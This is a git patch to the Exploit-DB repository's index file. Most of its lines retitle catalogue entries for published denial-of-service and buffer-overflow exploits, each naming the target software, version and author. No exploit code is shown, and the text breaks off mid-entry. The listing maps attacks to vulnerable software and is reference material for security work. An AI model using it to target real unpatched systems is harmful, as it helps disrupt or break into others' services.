From 5d67bcf1862c554d51f94b1b6725a468f2ad1795 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 19 Oct 2017 05:01:29 +0000 Subject: [PATCH] DB: 2017-10-19 5 new exploits Too many to list! --- files.csv | 9107 ++++++++++++++++--------------- platforms/cgi/webapps/43013.txt | 435 ++ platforms/linux/dos/43014.txt | 286 + platforms/php/webapps/18356.txt | 3 +- platforms/php/webapps/39474.txt | 2 +- platforms/php/webapps/43011.txt | 41 + platforms/php/webapps/43012.txt | 37 + platforms/php/webapps/43015.txt | 268 + 8 files changed, 5626 insertions(+), 4553 deletions(-) create mode 100755 platforms/cgi/webapps/43013.txt create mode 100755 platforms/linux/dos/43014.txt create mode 100755 platforms/php/webapps/43011.txt create mode 100755 platforms/php/webapps/43012.txt create mode 100755 platforms/php/webapps/43015.txt diff --git a/files.csv b/files.csv index e788953bf..622feebd2 100644 --- a/files.csv +++ b/files.csv @@ -37,7 +37,7 @@ id,file,description,date,author,platform,type,port 241,platforms/linux/dos/241.c,"ProFTPd 1.2.0 rc2 - Memory Leakage Exploit",2001-01-03,"Piotr Zurawski",linux,dos,21 244,platforms/linux/dos/244.java,"ProFTPd 1.2.0 pre10 - Remote Denial of Service",2001-01-12,JeT-Li,linux,dos,21 251,platforms/linux/dos/251.c,"APC UPS 3.7.2 - 'apcupsd' Local Denial of Service",2001-01-15,"the itch",linux,dos,0 -262,platforms/hardware/dos/262.pl,"Cisco Multiple Products - Automated Exploit Tool",2001-01-27,hypoclear,hardware,dos,0 +262,platforms/hardware/dos/262.pl,"Cisco (Multiple Products) - Automated Exploit Tool",2001-01-27,hypoclear,hardware,dos,0 264,platforms/novell/dos/264.c,"Novell BorderManager Enterprise Edition 3.5 - Denial of Service",2001-05-07,honoriak,novell,dos,0 274,platforms/linux/dos/274.c,"Linux Kernel 2.6.3 - 'setsockopt' Local Denial of Service",2004-04-21,"Julien Tinnes",linux,dos,0 276,platforms/windows/dos/276.delphi,"Microsoft Windows XP/2000 - TCP Connection Reset Remote Exploit",2004-04-22,Aphex,windows,dos,0 @@ -63,7 +63,7 @@ id,file,description,date,author,platform,type,port 376,platforms/windows/dos/376.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Null Pointer Crash",2004-08-04,anonymous,windows,dos,0 383,platforms/multiple/dos/383.c,"psyBNC 2.3 - Denial of Service",2002-05-19,"Lunar Fault",multiple,dos,31337 385,platforms/windows/dos/385.c,"Microsoft Messenger (Linux) - Denial of Service (MS03-043)",2004-08-08,VeNoMouS,windows,dos,0 -419,platforms/windows/dos/419.pl,"BadBlue 2.52 Web Server - Multiple Connections Denial of Service",2004-08-26,"GulfTech Security",windows,dos,0 +419,platforms/windows/dos/419.pl,"BadBlue 2.52 Web Server - Multiple Connections Denial of Service Vulnerabilities",2004-08-26,"GulfTech Security",windows,dos,0 420,platforms/win_x86/dos/420.java,"Bird Chat 1.61 - Denial of Service",2004-08-26,"Donato Ferrante",win_x86,dos,0 422,platforms/windows/dos/422.c,"Painkiller 1.3.1 - Denial of Service",2004-08-27,"Luigi Auriemma",windows,dos,0 423,platforms/windows/dos/423.pl,"Easy File Sharing Web Server 1.25 - Denial of Service",2004-08-27,"GulfTech Security",windows,dos,0 @@ -83,7 +83,7 @@ id,file,description,date,author,platform,type,port 585,platforms/windows/dos/585.pl,"Microsoft IIS - WebDAV XML Denial of Service (MS04-030)",2004-10-20,"Amit Klein",windows,dos,0 593,platforms/windows/dos/593.pl,"Quick 'n EasY 2.4 FTP Server - Remote Denial of Service",2004-10-24,KaGra,windows,dos,0 594,platforms/windows/dos/594.pl,"BaSoMail Server 1.24 - POP3/SMTP Remote Denial of Service",2004-10-24,KaGra,windows,dos,0 -599,platforms/windows/dos/599.py,"BaSoMail - Multiple Buffer Overflow Denial of Service",2004-10-26,muts,windows,dos,0 +599,platforms/windows/dos/599.py,"BaSoMail - Multiple Buffer Overflow Denial of Service Vulnerabilities",2004-10-26,muts,windows,dos,0 603,platforms/windows/dos/603.c,"Master of Orion III 1.2.5 - Denial of Service",2004-10-27,"Luigi Auriemma",windows,dos,0 604,platforms/windows/dos/604.c,"Age of Sail II 1.04.151 - Remote Buffer Overflow",2004-03-03,"Luigi Auriemma",windows,dos,0 605,platforms/windows/dos/605.c,"Alpha Black Zero 1.04 - Remote Denial of Service",2004-03-03,"Luigi Auriemma",windows,dos,0 @@ -91,7 +91,7 @@ id,file,description,date,author,platform,type,port 607,platforms/windows/dos/607.c,"Flash Messaging 5.2.0g - Remote Denial of Service",2004-03-02,"Luigi Auriemma",windows,dos,0 611,platforms/windows/dos/611.c,"Chesapeake TFTP Server 1.0 - Directory Traversal / Denial of Service (PoC)",2004-11-01,"Luigi Auriemma",windows,dos,0 625,platforms/windows/dos/625.pl,"WinFTP Server 1.6 - Denial of Service",2004-11-11,KaGra,windows,dos,0 -626,platforms/windows/dos/626.c,"Kerio Personal Firewall 4.1.1 - Multiple IP Options Denial of Service",2004-11-12,houseofdabus,windows,dos,0 +626,platforms/windows/dos/626.c,"Kerio Personal Firewall 4.1.1 - Multiple IP Options Denial of Service Vulnerabilities",2004-11-12,houseofdabus,windows,dos,0 628,platforms/windows/dos/628.c,"NetNote Server 2.2 build 230 - Crafted String Denial of Service",2004-11-13,class101,windows,dos,0 634,platforms/windows/dos/634.pl,"Secure Network Messenger 1.4.2 - Denial of Service",2004-11-15,ClearScreen,windows,dos,0 649,platforms/windows/dos/649.c,"wodFtpDLX Client - ActiveX Control Buffer Overflow Crash",2004-11-22,Komrade,windows,dos,0 @@ -148,7 +148,7 @@ id,file,description,date,author,platform,type,port 874,platforms/windows/dos/874.cpp,"Ethereal 0.10.9 (Windows) - '3G-A11' Remote Buffer Overflow",2005-03-12,"Leon Juranic",windows,dos,0 880,platforms/multiple/dos/880.pl,"Freeciv Server 2.0.0beta8 - Denial of Service",2005-03-14,"Nico Spicher",multiple,dos,0 882,platforms/windows/dos/882.cpp,"GoodTech Telnet Server < 5.0.7 - Buffer Overflow Crash",2005-03-15,Komrade,windows,dos,0 -886,platforms/windows/dos/886.pl,"PlatinumFTP 1.0.18 - Multiple Remote Denial of Service",2005-03-17,ports,windows,dos,0 +886,platforms/windows/dos/886.pl,"PlatinumFTP 1.0.18 - Multiple Remote Denial of Service Vulnerabilities",2005-03-17,ports,windows,dos,0 887,platforms/windows/dos/887.py,"MailEnable 1.8 - Remote Format String Denial of Service",2005-03-17,"Tal Zeltzer",windows,dos,0 888,platforms/windows/dos/888.txt,"phpDEV5 - System-Call Local Denial of Service",2005-03-17,Ali7,windows,dos,0 891,platforms/windows/dos/891.pl,"MCPWS Personal WebServer 1.3.21 - Denial of Service",2005-03-21,"Nico Spicher",windows,dos,0 @@ -159,7 +159,7 @@ id,file,description,date,author,platform,type,port 911,platforms/linux/dos/911.c,"Linux Kernel PPC64/IA64 (AIO) - Local Denial of Service",2005-04-04,"Daniel McNeil",linux,dos,0 916,platforms/windows/dos/916.pl,"MailEnable Enterprise 1.x - SMTP Remote Denial of Service",2005-04-05,CorryL,windows,dos,0 931,platforms/windows/dos/931.html,"Microsoft Internet Explorer - DHTML Object Handling Vulnerabilities (MS05-020)",2005-04-12,Skylined,windows,dos,0 -941,platforms/windows/dos/941.c,"Yager 5.24 - Multiple Denial of Service",2005-04-14,"Luigi Auriemma",windows,dos,0 +941,platforms/windows/dos/941.c,"Yager 5.24 - Multiple Denial of Service Vulnerabilities",2005-04-14,"Luigi Auriemma",windows,dos,0 942,platforms/windows/dos/942.c,"Microsoft Windows - Malformed IP Options Denial of Service (MS05-019)",2005-04-17,"Yuri Gushin",windows,dos,0 946,platforms/multiple/dos/946.c,"PostgreSQL 8.01 - Remote Reboot (Denial of Service)",2005-04-19,ChoiX,multiple,dos,0 948,platforms/multiple/dos/948.c,"Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service (MS05-019)",2005-04-20,houseofdabus,multiple,dos,0 @@ -176,7 +176,7 @@ id,file,description,date,author,platform,type,port 999,platforms/linux/dos/999.c,"Gaim 1.2.1 - URL Handling Remote Stack Overflow",2005-05-17,Ron,linux,dos,0 1000,platforms/windows/dos/1000.cpp,"Microsoft Windows XP/2003 - IPv6 Remote Denial of Service",2005-05-17,"Konrad Malewski",windows,dos,0 1008,platforms/multiple/dos/1008.c,"TCP TIMESTAMPS - Denial of Service",2005-05-21,"Daniel Hartmeier",multiple,dos,0 -1024,platforms/windows/dos/1024.html,"Microsoft Internet Explorer - Multiple Stack Overflows Crash",2005-05-31,"Benjamin Franz",windows,dos,0 +1024,platforms/windows/dos/1024.html,"Microsoft Internet Explorer - Multiple Stack Overflows Crashs",2005-05-31,"Benjamin Franz",windows,dos,0 1025,platforms/windows/dos/1025.html,"Microsoft Internet Explorer - JavaScript 'window()' Crash",2005-05-31,"Benjamin Franz",windows,dos,0 1027,platforms/windows/dos/1027.c,"FutureSoft TFTP Server 2000 - Remote Denial of Service",2005-06-02,ATmaCA,windows,dos,0 1037,platforms/multiple/dos/1037.c,"Tcpdump - bgp_update_print Remote Denial of Service",2005-06-09,simon,multiple,dos,0 @@ -259,11 +259,11 @@ id,file,description,date,author,platform,type,port 1343,platforms/windows/dos/1343.c,"Microsoft Windows Metafile - 'gdi32.dll' Denial of Service (MS05-053)",2005-11-29,"Winny Thomas",windows,dos,0 1345,platforms/php/dos/1345.php,"Xaraya 1.0.0 RC4 - 'create()' Denial of Service",2005-11-29,rgod,php,dos,0 1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0 -1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple Unauthenticated Remote Stack Overflow (PoC)",2005-12-02,Sowhat,windows,dos,0 +1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple Unauthenticated Remote Stack Overflows (PoC)",2005-12-02,Sowhat,windows,dos,0 1362,platforms/windows/dos/1362.html,"Mozilla Firefox 1.5 - 'history.dat' Looping (PoC)",2005-12-07,ZIPLOCK,windows,dos,0 1368,platforms/windows/dos/1368.cpp,"Counter Strike 2D 0.1.0.1 - Denial of Service",2005-12-11,"Iman Karim",windows,dos,0 1371,platforms/windows/dos/1371.c,"Macromedia Flash Media Server 2 - Remote Denial of Service",2005-12-14,Kozan,windows,dos,0 -1372,platforms/windows/dos/1372.html,"Microsoft Internet Explorer 6 - (pre tag Multiple single tags) Denial of Service",2005-12-14,"Markus Heer",windows,dos,0 +1372,platforms/windows/dos/1372.html,"Microsoft Internet Explorer 6 - PRE Tag Multiple Single Tags Denial of Service Vulnerabilities",2005-12-14,"Markus Heer",windows,dos,0 1376,platforms/windows/dos/1376.c,"Microsoft IIS - HTTP Request Denial of Service (1)",2005-12-19,Kozan,windows,dos,0 1377,platforms/windows/dos/1377.pl,"Microsoft IIS - HTTP Request Denial of Service (2)",2005-12-19,kokanin,windows,dos,0 1389,platforms/windows/dos/1389.html,"Microsoft Internet Explorer 6 - 'mshtml.dll datasrc' Denial of Service",2005-12-27,BuHa,windows,dos,0 @@ -289,7 +289,7 @@ id,file,description,date,author,platform,type,port 1531,platforms/windows/dos/1531.pl,"ArGoSoft FTP Server 1.4.3.5 - Remote Buffer Overflow (PoC)",2006-02-25,"Jerome Athias",windows,dos,0 1535,platforms/windows/dos/1535.c,"CrossFire 1.8.0 - (oldsocketmode) Remote Buffer Overflow (PoC)",2006-02-27,"Luigi Auriemma",windows,dos,0 1540,platforms/bsd/dos/1540.pl,"FreeBSD 6.0 - 'nfsd' Remote Kernel Panic (Denial of Service)",2006-02-28,"Evgeny Legerov",bsd,dos,0 -1551,platforms/hardware/dos/1551.txt,"Multiple Routers - (IRC Request) Disconnect Denial of Service",2006-03-04,"Ryan Meyer",hardware,dos,0 +1551,platforms/hardware/dos/1551.txt,"Multiple Routers - 'IRC Request' Disconnect Denial of Service",2006-03-04,"Ryan Meyer",hardware,dos,0 1552,platforms/windows/dos/1552.pl,"XM Easy Personal FTP Server 1.0 - 'Port' Remote Overflow (PoC)",2006-03-04,luka.research,windows,dos,0 1557,platforms/windows/dos/1557.c,"Freeciv 2.0.7 - (Jumbo Malloc) Crash (Denial of Service)",2006-03-06,"Luigi Auriemma",windows,dos,0 1558,platforms/windows/dos/1558.c,"LieroX 0.62b - Remote Server/Client Denial of Service",2006-03-06,"Luigi Auriemma",windows,dos,0 @@ -373,7 +373,7 @@ id,file,description,date,author,platform,type,port 2124,platforms/windows/dos/2124.php,"XChat 2.6.7 (Windows) - Remote Denial of Service (PHP)",2006-08-07,ratboy,windows,dos,0 2147,platforms/windows/dos/2147.pl,"XChat 2.6.7 (Windows) - Remote Denial of Service (Perl)",2006-08-08,Elo,windows,dos,0 2156,platforms/hardware/dos/2156.c,"PocketPC Mms Composer - 'WAPPush' Denial of Service",2006-08-09,"Collin Mulliner",hardware,dos,0 -2160,platforms/windows/dos/2160.c,"OpenMPT 1.17.02.43 - Multiple Remote Buffer Overflow (PoC)",2006-08-10,"Luigi Auriemma",windows,dos,0 +2160,platforms/windows/dos/2160.c,"OpenMPT 1.17.02.43 - Multiple Remote Buffer Overflows (PoC)",2006-08-10,"Luigi Auriemma",windows,dos,0 2176,platforms/hardware/dos/2176.html,"Nokia Symbian 60 3rd Edition - Browser Crash (Denial of Service)",2006-08-13,Qode,hardware,dos,0 2179,platforms/multiple/dos/2179.c,"Opera 9 - IRC Client Remote Denial of Service",2006-08-13,Preddy,multiple,dos,0 2180,platforms/multiple/dos/2180.py,"Opera 9 IRC Client - Remote Denial of Service (Python)",2006-08-13,Preddy,multiple,dos,0 @@ -383,7 +383,7 @@ id,file,description,date,author,platform,type,port 2208,platforms/windows/dos/2208.html,"Macromedia Flash 9 - (IE Plugin) Remote Crash (Denial of Service)",2006-08-18,Mr.Niega,windows,dos,0 2210,platforms/windows/dos/2210.c,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (2)",2006-08-18,vegas78,windows,dos,0 2237,platforms/multiple/dos/2237.sh,"Apache (mod_rewrite) < 1.3.37/2.0.59/2.2.3 - Remote Overflow (PoC)",2006-08-21,"Jacobo Avariento",multiple,dos,0 -2238,platforms/windows/dos/2238.html,"Microsoft Internet Explorer - Multiple COM Object Color Property Denial of Service",2006-08-21,nop,windows,dos,0 +2238,platforms/windows/dos/2238.html,"Microsoft Internet Explorer - Multiple COM Object Color Property Denial of Service Vulnerabilities",2006-08-21,nop,windows,dos,0 2244,platforms/multiple/dos/2244.pl,"Mozilla Firefox 1.5.0.6 - (FTP Request) Remote Denial of Service",2006-08-22,"Tomas Kempinsky",multiple,dos,0 2245,platforms/windows/dos/2245.pl,"MDaemon POP3 Server < 9.06 - (USER) Remote Buffer Overflow (PoC)",2006-08-22,"Leon Juranic",windows,dos,0 2246,platforms/hardware/dos/2246.cpp,"2WIRE Modems/Routers - 'CRLF' Denial of Service",2006-08-22,preth00nker,hardware,dos,0 @@ -491,7 +491,7 @@ id,file,description,date,author,platform,type,port 3223,platforms/cgi/dos/3223.pl,"CVSTrac 2.0.0 - Defacement Denial of Service",2007-01-29,"Ralf S. Engelschall",cgi,dos,0 3224,platforms/windows/dos/3224.c,"Intel 2200BG 802.11 - disassociation packet Kernel Memory Corruption",2007-01-29,"Breno Silva Pinto",windows,dos,0 3229,platforms/windows/dos/3229.py,"Dev-C++ 4.9.9.2 - '.CPP' File Parsing Local Stack Overflow (PoC)",2007-01-30,shinnai,windows,dos,0 -3230,platforms/osx/dos/3230.rb,"Apple iChat Bonjour 3.1.6.441 - Multiple Denial of Service",2007-01-30,MoAB,osx,dos,0 +3230,platforms/osx/dos/3230.rb,"Apple iChat Bonjour 3.1.6.441 - Multiple Denial of Service Vulnerabilities",2007-01-30,MoAB,osx,dos,0 3248,platforms/windows/dos/3248.rb,"CA BrightStor ARCserve 11.5.2.0 - 'catirpc.dll' RPC Server Denial of Service",2007-02-01,Shirkdog,windows,dos,0 3254,platforms/windows/dos/3254.py,"Remotesoft .NET Explorer 2.0.1 - Local Stack Overflow (PoC)",2007-02-02,shinnai,windows,dos,0 3257,platforms/osx/dos/3257.php,"Chicken of the VNC 2.0 - (NULL-pointer) Remote Denial of Service",2007-02-02,poplix,osx,dos,0 @@ -505,10 +505,10 @@ id,file,description,date,author,platform,type,port 3307,platforms/windows/dos/3307.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow (PoC)",2007-02-14,shinnai,windows,dos,0 3308,platforms/windows/dos/3308.pl,"MailEnable Professional/Enterprise 2.37 - Denial of Service",2007-02-14,mu-b,windows,dos,0 3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 - 'CWD' Remote Buffer Overflow (PoC)",2007-02-18,r0ut3r,windows,dos,0 -3341,platforms/windows/dos/3341.cpp,"TurboFTP Server 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service",2007-02-20,Marsu,windows,dos,0 +3341,platforms/windows/dos/3341.cpp,"TurboFTP Server 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service Vulnerabilities",2007-02-20,Marsu,windows,dos,0 3343,platforms/windows/dos/3343.cpp,"FTP Voyager 14.0.0.3 - (CWD) Remote Stack Overflow (PoC)",2007-02-20,Marsu,windows,dos,0 3347,platforms/windows/dos/3347.cpp,"FTP Explorer 1.0.1 Build 047 - Remote CPU Consumption (Denial of Service)",2007-02-20,Marsu,windows,dos,0 -3350,platforms/windows/dos/3350.html,"BrowseDialog Class - 'ccrpbds6.dll' Multiple Methods Denial of Service",2007-02-21,shinnai,windows,dos,0 +3350,platforms/windows/dos/3350.html,"BrowseDialog Class - 'ccrpbds6.dll' Multiple Denial of Service Vulnerabilities",2007-02-21,shinnai,windows,dos,0 3362,platforms/multiple/dos/3362.py,"Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow Denial of Service",2007-02-23,"Trirat Puttaraksa",multiple,dos,0 3385,platforms/windows/dos/3385.pl,"XM Easy Personal FTP Server 5.30 - 'ABOR' Format String Denial of Service",2007-02-28,"Umesh Wanve",windows,dos,0 3392,platforms/windows/dos/3392.html,"DivX Web Player 1.3.0 - 'npdivx32.dll' Remote Denial of Service",2007-03-01,shinnai,windows,dos,0 @@ -559,9 +559,9 @@ id,file,description,date,author,platform,type,port 3807,platforms/linux/dos/3807.c,"MyDNS 1.1.0 - Remote Heap Overflow (PoC)",2007-04-27,mu-b,linux,dos,0 3819,platforms/windows/dos/3819.py,"RealPlayer 10 - '.ra' Remote Denial of Service",2007-04-30,n00b,windows,dos,0 3826,platforms/windows/dos/3826.html,"PowerPoint Viewer OCX 3.2 - (ActiveX Control) Denial of Service",2007-05-01,shinnai,windows,dos,0 -3830,platforms/windows/dos/3830.html,"Excel Viewer OCX 3.1.0.6 - Multiple Methods Denial of Service",2007-05-02,shinnai,windows,dos,0 +3830,platforms/windows/dos/3830.html,"Excel Viewer OCX 3.1.0.6 - Multiple Denial of Service Vulnerabilities",2007-05-02,shinnai,windows,dos,0 3836,platforms/windows/dos/3836.html,"Word Viewer OCX 3.2 - Remote Denial of Service",2007-05-03,shinnai,windows,dos,0 -3845,platforms/windows/dos/3845.html,"Office Viewer OCX 3.2.0.5 - Multiple Methods Denial of Service",2007-05-04,shinnai,windows,dos,0 +3845,platforms/windows/dos/3845.html,"Office Viewer OCX 3.2.0.5 - Multiple Denial of Service Vulnerabilities",2007-05-04,shinnai,windows,dos,0 3851,platforms/multiple/dos/3851.c,"ZOO - .ZOO File Decompression Infinite Loop Denial of Service (PoC)",2007-05-04,Jean-Sébastien,multiple,dos,0 3866,platforms/windows/dos/3866.html,"Versalsoft HTTP File Uploader - ActiveX 6.36 (AddFile) Remote Denial of Service",2007-05-07,shinnai,windows,dos,0 3871,platforms/multiple/dos/3871.html,"Opera 9.10 - 'alert()' Remote Denial of Service",2007-05-08,Dj7xpl,multiple,dos,0 @@ -637,7 +637,7 @@ id,file,description,date,author,platform,type,port 4359,platforms/multiple/dos/4359.txt,"Apple QuickTime < 7.2 - SMIL Remote Integer Overflow",2007-09-03,"David Vaartjes",multiple,dos,0 4369,platforms/windows/dos/4369.html,"Microsoft Visual FoxPro 6.0 - FPOLE.OCX 6.0.8450.0 Remote (PoC)",2007-09-06,shinnai,windows,dos,0 4373,platforms/windows/dos/4373.html,"EDraw Office Viewer Component 5.2 - ActiveX Remote Buffer Overflow (PoC)",2007-09-07,shinnai,windows,dos,0 -4375,platforms/windows/dos/4375.txt,"BaoFeng2 - 'mps.dll' ActiveX Multiple Remote Buffer Overflow (PoC)",2007-09-08,ZhenHan.Liu,windows,dos,0 +4375,platforms/windows/dos/4375.txt,"BaoFeng2 - 'mps.dll' ActiveX Multiple Remote Buffer Overflows (PoC)",2007-09-08,ZhenHan.Liu,windows,dos,0 4379,platforms/windows/dos/4379.html,"Microsoft SQL Server - Distributed Management Objects 'sqldmo.dll' Buffer Overflow",2007-09-08,rgod,windows,dos,0 4403,platforms/windows/dos/4403.py,"JetCast Server 2.0.0.4308 - Remote Denial of Service",2007-09-13,vCore,windows,dos,0 4409,platforms/windows/dos/4409.html,"HP - ActiveX 'hpqutil.dll' ListFiles Remote Heap Overflow (PoC)",2007-09-14,GOODFELLAS,windows,dos,0 @@ -738,7 +738,7 @@ id,file,description,date,author,platform,type,port 5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Authenticated Remote Stack Overflow (PoC)",2008-05-31,securfrog,windows,dos,0 5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0 5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0 -5727,platforms/windows/dos/5727.pl,"Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0 +5727,platforms/windows/dos/5727.pl,"Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflows (PoC)",2008-06-02,securfrog,windows,dos,0 5749,platforms/multiple/dos/5749.pl,"Asterisk 1.2.x - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0 5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - 'CWD' Authenticated Remote Memory Consumption",2008-06-14,"Praveen Darshanam",linux,dos,0 5817,platforms/windows/dos/5817.pl,"Dana IRC 1.3 - Remote Buffer Overflow (PoC)",2008-06-14,t0pP8uZz,windows,dos,0 @@ -864,7 +864,7 @@ id,file,description,date,author,platform,type,port 7226,platforms/windows/dos/7226.html,"Google Chrome - MetaCharacter URI Obfuscation",2008-11-25,"Aditya K Sood",windows,dos,0 7249,platforms/windows/dos/7249.php,"i.Scribe SMTP Client 2.00b - (wscanf) Remote Format String (PoC)",2008-11-27,"Alfons Luja",windows,dos,0 7262,platforms/windows/dos/7262.pl,"Microsoft Office - Communicator (SIP) Remote Denial of Service",2008-11-28,"Praveen Darshanam",windows,dos,0 -7296,platforms/windows/dos/7296.txt,"Apple iTunes 8.0.2.20/QuickTime 7.5.5 - '.mov' Multiple Off By Overflow (PoC)",2008-11-30,"laurent gaffié",windows,dos,0 +7296,platforms/windows/dos/7296.txt,"Apple iTunes 8.0.2.20/QuickTime 7.5.5 - '.mov' Multiple Off By Overflows (PoC)",2008-11-30,"laurent gaffié",windows,dos,0 7297,platforms/windows/dos/7297.py,"Cain & Abel 4.9.23 - '.rdp' Buffer Overflow (PoC)",2008-11-30,Encrypt3d.M!nd,windows,dos,0 7307,platforms/windows/dos/7307.txt,"Electronics Workbench - '.ewb' Local Stack Overflow (PoC)",2008-11-30,Zigma,windows,dos,0 7314,platforms/windows/dos/7314.txt,"Maxum Rumpus 6.0 - Multiple Remote Buffer Overflow Vulnerabilities",2008-12-01,"BLUE MOON",windows,dos,0 @@ -936,7 +936,7 @@ id,file,description,date,author,platform,type,port 7962,platforms/windows/dos/7962.pl,"Hex Workshop 6.0 - '.cmap' Invalid Memory Reference (PoC)",2009-02-03,DATA_SNIPER,windows,dos,0 7985,platforms/windows/dos/7985.pl,"Novell Groupwise 8.0 - Malformed RCPT Command Off-by-One Exploit",2009-02-04,"Praveen Darshanam",windows,dos,0 7986,platforms/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 - Authorisation Stack Buffer Overflow (PoC)",2009-02-04,"Praveen Darshanam",windows,dos,0 -7990,platforms/windows/dos/7990.py,"UltraVNC/TightVNC - Multiple VNC Clients Multiple Integer Overflow (PoC)",2009-02-04,"Andres Luksenberg",windows,dos,0 +7990,platforms/windows/dos/7990.py,"UltraVNC/TightVNC - Multiple VNC Clients Multiple Integer Overflows (PoC)",2009-02-04,"Andres Luksenberg",windows,dos,0 7995,platforms/windows/dos/7995.pl,"FeedMon 2.7.0.0 - outline Tag Buffer Overflow (PoC)",2009-02-05,"Praveen Darshanam",windows,dos,0 8008,platforms/hardware/dos/8008.txt,"NETGEAR SSL312 Router - Denial of Service",2009-02-09,Rembrandt,hardware,dos,0 8013,platforms/hardware/dos/8013.txt,"Nokia N95-8 - '.jpg' Remote Crash (PoC)",2009-02-09,"Juan Yacubian",hardware,dos,0 @@ -954,7 +954,7 @@ id,file,description,date,author,platform,type,port 8125,platforms/hardware/dos/8125.rb,"HTC Touch - vCard over IP Denial of Service",2009-03-02,"Mobile Security Lab",hardware,dos,0 8129,platforms/windows/dos/8129.pl,"Novell eDirectory iMonitor - 'Accept-Language' Request Buffer Overflow (PoC)",2009-03-02,"Praveen Darshanam",windows,dos,0 8135,platforms/windows/dos/8135.pl,"Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Local Heap Overflow (PoC)",2009-03-02,Hakxer,windows,dos,0 -8148,platforms/multiple/dos/8148.pl,"Yaws < 1.80 - (Multiple headers) Remote Denial of Service",2009-03-03,"Praveen Darshanam",multiple,dos,0 +8148,platforms/multiple/dos/8148.pl,"Yaws < 1.80 - Multiple Headers Remote Denial of Service Vulnerabilities",2009-03-03,"Praveen Darshanam",multiple,dos,0 8156,platforms/windows/dos/8156.txt,"Easy Web Password 1.2 - Local Heap Memory Consumption (PoC)",2009-03-04,Stack,windows,dos,0 8163,platforms/bsd/dos/8163.txt,"Libc - 'libc:fts_*()' Local Denial of Service",2009-03-05,SecurityReason,bsd,dos,0 8180,platforms/windows/dos/8180.c,"eZip Wizard 3.0 - Local Stack Buffer Overflow (PoC) (SEH)",2009-03-09,"fl0 fl0w",windows,dos,0 @@ -988,7 +988,7 @@ id,file,description,date,author,platform,type,port 8325,platforms/windows/dos/8325.py,"Apple Safari 3.2.2/4b - (nested elements) XML Parsing Remote Crash",2009-03-31,"Ahmed Obied",windows,dos,0 8333,platforms/multiple/dos/8333.txt,"Sun Calendar Express Web Server - (Denial of Service / Cross-Site Scripting) Multiple Remote Vulnerabilities",2009-03-31,"Core Security",multiple,dos,0 8335,platforms/windows/dos/8335.c,"DeepBurner 1.9.0.228 - Stack Buffer Overflow (SEH) (PoC)",2009-04-01,"fl0 fl0w",windows,dos,0 -8337,platforms/multiple/dos/8337.c,"XBMC 8.10 - GET Multiple Remote Buffer Overflow (PoC)",2009-04-01,n00b,multiple,dos,0 +8337,platforms/multiple/dos/8337.c,"XBMC 8.10 - GET Multiple Remote Buffer Overflows (PoC)",2009-04-01,n00b,multiple,dos,0 8344,platforms/multiple/dos/8344.py,"IBM DB2 < 9.5 pack 3a - Connect Denial of Service",2009-04-03,"Dennis Yurichev",multiple,dos,0 8345,platforms/multiple/dos/8345.py,"IBM DB2 < 9.5 pack 3a - Data Stream Denial of Service",2009-04-03,"Dennis Yurichev",multiple,dos,0 8352,platforms/windows/dos/8352.txt,"Amaya 11.1 - XHTML Parser Remote Buffer Overflow (PoC)",2009-04-06,cicatriz,windows,dos,0 @@ -1052,7 +1052,7 @@ id,file,description,date,author,platform,type,port 8646,platforms/multiple/dos/8646.php,"Mortbay Jetty 7.0.0-pre5 Dispatcher Servlet - Denial of Service",2009-05-08,ikki,multiple,dos,0 8650,platforms/windows/dos/8650.c,"TYPSoft FTP Server 1.11 - 'ABORT' Remote Denial of Service",2009-05-11,"Jonathan Salwan",windows,dos,0 8665,platforms/windows/dos/8665.html,"Java SE Runtime Environment JRE 6 Update 13 - Multiple Vulnerabilities",2009-05-13,shinnai,windows,dos,0 -8669,platforms/multiple/dos/8669.c,"IPsec-Tools < 0.7.2 (racoon frag-isakmp) - Multiple Remote Denial of Service (PoC)",2009-05-13,mu-b,multiple,dos,0 +8669,platforms/multiple/dos/8669.c,"IPsec-Tools < 0.7.2 (racoon frag-isakmp) - Multiple Remote Denial of Service Vulnerabilities (PoC)",2009-05-13,mu-b,multiple,dos,0 8677,platforms/windows/dos/8677.txt,"DigiMode Maya 1.0.2 - '.m3u' / '.m3l' Buffer Overflow (PoC)",2009-05-14,SirGod,windows,dos,0 8695,platforms/multiple/dos/8695.txt,"Eggdrop/Windrop 1.6.19 - ctcpbuf Remote Crash",2009-05-15,"Thomas Sader",multiple,dos,0 8712,platforms/windows/dos/8712.txt,"httpdx 0.5b - Multiple Remote Denial of Service Vulnerabilities",2009-05-18,sico2819,windows,dos,0 @@ -1092,7 +1092,7 @@ id,file,description,date,author,platform,type,port 9090,platforms/windows/dos/9090.pl,"otsAV DJ 1.85.064 - '.ofl' Local Heap Overflow (PoC)",2009-07-09,hack4love,windows,dos,0 9100,platforms/windows/dos/9100.html,"Microsoft Internet Explorer - (AddFavorite) Remote Crash (PoC)",2009-07-09,Sberry,windows,dos,0 9102,platforms/windows/dos/9102.pl,"PatPlayer 3.9 - '.m3u' Local Heap Overflow 